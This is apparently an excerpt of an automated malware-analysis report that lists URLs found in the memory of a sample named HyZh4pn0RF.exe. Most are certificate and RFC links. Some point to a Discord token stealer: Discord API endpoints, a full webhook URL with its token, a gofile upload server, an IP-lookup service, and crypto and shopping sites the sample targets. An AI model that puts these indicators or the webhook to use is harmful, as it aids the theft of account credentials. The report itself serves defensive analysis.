00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824292965.000002539AFA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3AB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790797363.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786346031.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812368209.000002539A2E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B44F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1818290124.0000025398310000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812957078.000002539A97F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787246377.000002539A977000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807987225.000002539A97A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794431278.000002539A2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809460438.000002539A2E4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794163535.000002539A2D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790797363.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786346031.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/p
Source: HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812368209.000002539A2E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794431278.000002539A2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809460438.000002539A2E4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794163535.000002539A2D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/yyValueErro
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A6CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822164617.000002539A6D6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807329061.000002539A6CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826914311.000002539BC50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824647034.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785564604.000002539B46D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784136988.000002539B3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3B1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825933015.000002539B3B4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816843287.000002539B462000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784569592.000002539B3C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784136988.000002539B3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825933015.000002539B3C9000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812494121.000002539B2AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794610908.000002539B2A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808214858.000002539B2A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/4g
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/C7
Source: HyZh4pn0RF.exe, 00000002.00000003.1812494121.000002539B2AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794610908.000002539B2A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808214858.000002539B2A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/Gd
Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808293549.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821256115.000002539A3C1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788862603.000002539A3A4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806014708.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794327700.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B475000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790103376.000002539A3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806133338.000002539A7EA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791704398.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498852357.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811177117.000002539A8C7000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790850713.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: HyZh4pn0RF.exe, 00000002.00000002.1822292872.000002539A719000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817908654.000002539A718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824647034.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: HyZh4pn0RF.exe, 00000002.00000002.1822292872.000002539A719000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817908654.000002539A718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps8
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825548276.000002539B33D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 0000000A.00000003.1979590875.000001F3E341D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: HyZh4pn0RF.exe, 00000002.00000002.1824793076.000002539B273000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824738204.000002539B202000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B202000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)z&
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org)
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/users/
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/guilds/
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/guilds/r
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v6/users/
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdR
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/r
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gift/
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.gift/2d
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://disney.com)
